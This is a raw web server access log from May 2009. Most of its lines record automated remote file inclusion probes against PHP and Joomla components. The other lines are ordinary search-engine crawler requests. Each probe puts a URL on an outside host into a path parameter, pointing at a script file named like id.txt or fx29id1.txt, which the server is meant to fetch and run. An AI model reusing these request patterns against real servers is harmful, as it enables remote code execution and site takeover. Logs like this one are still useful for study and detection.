209.175.180.194 - - [16/May/2009:20:31:22 -0500] "GET /logs//classified_right.php?language_dir=http://www.masuccessguy.com//docs/pifsystem??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
66.226.153.1 - - [16/May/2009:20:32:55 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.kenniscentrumgemeenten.nl//assets/export/id.txt??%0D?? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
66.226.153.1 - - [16/May/2009:20:32:55 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.kenniscentrumgemeenten.nl//assets/export/id.txt??%0D?? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
65.55.107.182 - - [16/May/2009:20:33:00 -0500] "GET /logs/access_log.1158710400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.44.79.35 - - [16/May/2009:20:35:46 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.44.79.35 - - [16/May/2009:20:35:46 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.44.79.35 - - [16/May/2009:20:35:46 -0500] "GET /logs/access_log.1238803200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.107.180 - - [16/May/2009:20:36:30 -0500] "GET /logs/access_log.1232496000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.90.72.88 - - [16/May/2009:20:39:10 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 200 189705 "-""libwww-perl/5.805"
69.90.72.88 - - [16/May/2009:20:39:10 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 200 3247 "-""libwww-perl/5.805"
193.221.119.126 - - [16/May/2009:20:40:45 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
193.221.119.126 - - [16/May/2009:20:40:48 -0500] "GET /logs/access_log.1239926400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 377 "-""Mozilla/5.0"
193.221.119.126 - - [16/May/2009:20:40:48 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
209.200.8.89 - - [16/May/2009:20:45:15 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
209.200.8.89 - - [16/May/2009:20:45:16 -0500] "GET /logs/access_log.1239926400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 377 "-""Mozilla/5.0"
209.200.8.89 - - [16/May/2009:20:45:16 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
209.200.8.89 - - [16/May/2009:20:45:37 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/id1v4.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
209.200.8.89 - - [16/May/2009:20:45:37 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/id1v4.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
209.200.8.89 - - [16/May/2009:20:45:37 -0500] "GET /logs/access_log.1239926400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/id1v4.txt?? HTTP/1.1" 404 377 "-""Mozilla/5.0"
69.94.30.156 - - [16/May/2009:20:46:02 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.festasapeca.com.br//cil.gif?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
69.94.30.156 - - [16/May/2009:20:46:02 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.festasapeca.com.br//cil.gif?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
69.94.30.156 - - [16/May/2009:20:46:02 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.festasapeca.com.br//cil.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
69.94.30.156 - - [16/May/2009:20:46:02 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.festasapeca.com.br//cil.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
65.55.106.172 - - [16/May/2009:20:46:30 -0500] "GET /logs/access_log.1113609600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.200.8.89 - - [16/May/2009:20:47:32 -0500] "GET /logs/articles/?sIncPath=http://www.hajobakker.com/portfolio/idont.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
209.200.8.89 - - [16/May/2009:20:47:32 -0500] "GET /articles/?sIncPath=http://www.hajobakker.com/portfolio/idont.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.803"
209.200.8.89 - - [16/May/2009:20:47:33 -0500] "GET /logs/articles/?sIncPath=http://www.hajobakker.com/portfolio/idont.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
209.200.8.89 - - [16/May/2009:20:47:33 -0500] "GET /articles/?sIncPath=http://www.hajobakker.com/portfolio/idont.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.803"
208.64.202.135 - - [16/May/2009:20:47:36 -0500] "GET /logs/access_log.1239926400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 377 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
208.64.202.135 - - [16/May/2009:20:47:36 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 350 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
208.64.202.135 - - [16/May/2009:20:47:36 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 355 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
72.32.210.206 - - [16/May/2009:20:47:44 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.zodiak.lv////ftp/fx29id1.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
72.32.210.206 - - [16/May/2009:20:47:44 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.zodiak.lv////ftp/fx29id1.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
72.32.210.206 - - [16/May/2009:20:47:44 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.zodiak.lv////ftp/fx29id1.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
72.32.210.206 - - [16/May/2009:20:47:44 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.zodiak.lv////ftp/fx29id1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
208.64.202.135 - - [16/May/2009:20:47:52 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 350 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
208.64.202.135 - - [16/May/2009:20:47:52 -0500] "GET /logs/access_log.1239926400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 377 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
208.64.202.135 - - [16/May/2009:20:47:52 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 355 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
72.32.210.206 - - [16/May/2009:20:48:49 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.zodiak.lv////ftp/fx29id1.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
72.32.210.206 - - [16/May/2009:20:48:49 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.zodiak.lv////ftp/fx29id1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
72.32.210.206 - - [16/May/2009:20:48:49 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.zodiak.lv////ftp/fx29id1.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
72.32.210.206 - - [16/May/2009:20:48:49 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.zodiak.lv////ftp/fx29id1.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
62.44.79.35 - - [16/May/2009:20:56:15 -0500] "GET /logs/access_log.1237507200////////?cmd&file=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
62.44.79.35 - - [16/May/2009:20:56:15 -0500] "GET /logs/access_log.1237420800////////?cmd&file=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
62.44.79.35 - - [16/May/2009:20:56:15 -0500] "GET ////////?cmd&file=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 200 3251 "-""Mozilla/5.0"
62.44.79.35 - - [16/May/2009:20:56:19 -0500] "GET /logs////////?cmd&file=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 200 189709 "-""Mozilla/5.0"
62.44.79.35 - - [16/May/2009:20:57:16 -0500] "GET /errors.php?error=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.44.79.35 - - [16/May/2009:20:57:16 -0500] "GET /logs/access_log.1237420800/errors.php?error=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.44.79.35 - - [16/May/2009:20:57:16 -0500] "GET /logs/errors.php?error=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.44.79.35 - - [16/May/2009:20:57:16 -0500] "GET /logs/access_log.1237507200/errors.php?error=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.44.79.35 - - [16/May/2009:20:58:30 -0500] "GET /logs/errors.php?error=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.44.79.35 - - [16/May/2009:20:58:30 -0500] "GET /logs/access_log.1236902400/errors.php?error=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.44.79.35 - - [16/May/2009:20:58:30 -0500] "GET /errors.php?error=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.44.79.35 - - [16/May/2009:20:58:34 -0500] "GET /logs/access_log.1237334400/errors.php?error=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.44.79.35 - - [16/May/2009:21:04:25 -0500] "GET /errors.php?error=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.44.79.35 - - [16/May/2009:21:04:25 -0500] "GET /logs/access_log.1236643200/errors.php?error=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.44.79.35 - - [16/May/2009:21:04:25 -0500] "GET /logs/errors.php?error=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.44.79.35 - - [16/May/2009:21:04:37 -0500] "GET /logs/access_log.1236643200////////?cmd&file=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
62.44.79.35 - - [16/May/2009:21:04:37 -0500] "GET ////////?cmd&file=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 200 3251 "-""Mozilla/5.0"
62.44.79.35 - - [16/May/2009:21:04:43 -0500] "GET /logs////////?cmd&file=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 200 189709 "-""Mozilla/5.0"
62.44.79.35 - - [16/May/2009:21:05:32 -0500] "GET /logs/access_log.1238803200/errors.php?error=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.44.79.35 - - [16/May/2009:21:05:55 -0500] "GET /logs/access_log.1238803200////////?cmd&file=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.249.67.180 - - [16/May/2009:21:10:54 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.180 - - [16/May/2009:21:10:54 -0500] "GET /logs/access_log.1199318400 HTTP/1.1" 200 684 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.106.121 - - [16/May/2009:21:17:06 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.121 - - [16/May/2009:21:18:02 -0500] "GET /logs/access_log.1154304000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.249.36.194 - - [16/May/2009:21:18:12 -0500] "GET /logs//guestbook1//admin.php?include_path=http://sherif-dudulz.ucoz.com/id.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
218.249.36.194 - - [16/May/2009:21:18:13 -0500] "GET //guestbook1//admin.php?include_path=http://sherif-dudulz.ucoz.com/id.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
208.112.87.9 - - [16/May/2009:21:20:46 -0500] "GET /logs/http://oubkhammuseum.com/templates/idvop.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
208.112.87.9 - - [16/May/2009:21:20:47 -0500] "GET /http://oubkhammuseum.com/templates/idvop.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
72.29.82.154 - - [16/May/2009:21:21:00 -0500] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
72.29.82.154 - - [16/May/2009:21:21:00 -0500] "GET /logs/access_log.1239926400//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.29.82.154 - - [16/May/2009:21:21:01 -0500] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.187.99.209 - - [16/May/2009:21:21:26 -0500] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
66.187.99.209 - - [16/May/2009:21:21:26 -0500] "GET /logs/access_log.1239926400//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.187.99.209 - - [16/May/2009:21:21:26 -0500] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.249.67.180 - - [16/May/2009:21:22:07 -0500] "GET /logs/access_log.1211155200 HTTP/1.1" 200 702 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.19.228.18 - - [16/May/2009:21:22:29 -0500] "GET /logs//embed/day.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
67.19.228.18 - - [16/May/2009:21:22:29 -0500] "GET /logs/access_log.1229299200//embed/day.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
67.19.228.18 - - [16/May/2009:21:22:29 -0500] "GET //embed/day.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
67.19.228.18 - - [16/May/2009:21:23:14 -0500] "GET //embed/day.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
67.19.228.18 - - [16/May/2009:21:23:14 -0500] "GET /logs//embed/day.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
67.19.228.18 - - [16/May/2009:21:23:14 -0500] "GET /logs/access_log.1229299200//embed/day.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
67.19.228.18 - - [16/May/2009:21:25:25 -0500] "GET //embed/day.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
67.19.228.18 - - [16/May/2009:21:25:25 -0500] "GET /logs/access_log.1229299200//embed/day.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
67.19.228.18 - - [16/May/2009:21:25:26 -0500] "GET /logs//embed/day.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
65.55.106.181 - - [16/May/2009:21:27:59 -0500] "GET /logs/access_log.1130630400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.191 - - [16/May/2009:21:29:01 -0500] "GET /logs/access_log.1234656000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
63.111.105.6 - - [16/May/2009:21:29:02 -0500] "GET /logs//appserv/main.php?appserv_root=http://upfcorp.com/components/.bash/osy.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.800"
63.111.105.6 - - [16/May/2009:21:29:02 -0500] "GET //appserv/main.php?appserv_root=http://upfcorp.com/components/.bash/osy.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.800"
209.90.91.245 - - [16/May/2009:21:32:20 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.822"
209.90.91.245 - - [16/May/2009:21:32:20 -0500] "GET /administrator/components/com_remository/admin.remository.php?http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.822"
64.118.90.253 - - [16/May/2009:21:32:34 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.823"
64.118.90.253 - - [16/May/2009:21:32:34 -0500] "GET /administrator/components/com_remository/admin.remository.php?http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.823"
209.90.91.245 - - [16/May/2009:21:32:44 -0500] "GET /logs/errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.822"
209.90.91.245 - - [16/May/2009:21:32:44 -0500] "GET /errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.822"
66.219.97.207 - - [16/May/2009:21:32:54 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
66.219.97.207 - - [16/May/2009:21:32:54 -0500] "GET /administrator/components/com_remository/admin.remository.php?http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
66.219.97.207 - - [16/May/2009:21:32:56 -0500] "GET /logs/errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
66.219.97.207 - - [16/May/2009:21:32:56 -0500] "GET /errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
64.118.90.253 - - [16/May/2009:21:33:04 -0500] "GET /logs/errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.823"
64.118.90.253 - - [16/May/2009:21:33:04 -0500] "GET /errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.823"
66.249.67.180 - - [16/May/2009:21:33:20 -0500] "GET /logs/access_log.1130457600 HTTP/1.1" 200 793 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
210.118.194.200 - - [16/May/2009:21:34:08 -0500] "GET /logs/access_log.1230422400//?_zb_path=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
210.118.194.200 - - [16/May/2009:21:34:08 -0500] "GET //?_zb_path=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
210.118.194.200 - - [16/May/2009:21:34:17 -0500] "GET /logs//?_zb_path=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 200 189703 "-""Mozilla/5.0"
69.172.92.14 - - [16/May/2009:21:35:29 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:21:35:29 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:21:35:29 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:21:35:29 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:21:35:39 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:21:35:39 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
77.221.130.19 - - [16/May/2009:21:36:48 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
77.221.130.19 - - [16/May/2009:21:36:48 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
77.221.130.19 - - [16/May/2009:21:36:54 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
77.221.130.19 - - [16/May/2009:21:36:54 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
69.59.21.101 - - [16/May/2009:21:37:50 -0500] "GET /erros.php?erros=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
69.59.21.101 - - [16/May/2009:21:37:50 -0500] "GET /logs/access_log.1238630400/erros.php?erros=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.59.21.101 - - [16/May/2009:21:37:50 -0500] "GET /logs/erros.php?erros=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
69.59.21.101 - - [16/May/2009:21:38:20 -0500] "GET /logs/access_log.1231200000/erros.php?erros=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
209.172.33.230 - - [16/May/2009:21:39:12 -0500] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
209.172.33.230 - - [16/May/2009:21:39:17 -0500] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.812"
217.13.127.95 - - [16/May/2009:21:39:31 -0500] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.13.127.95 - - [16/May/2009:21:39:31 -0500] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
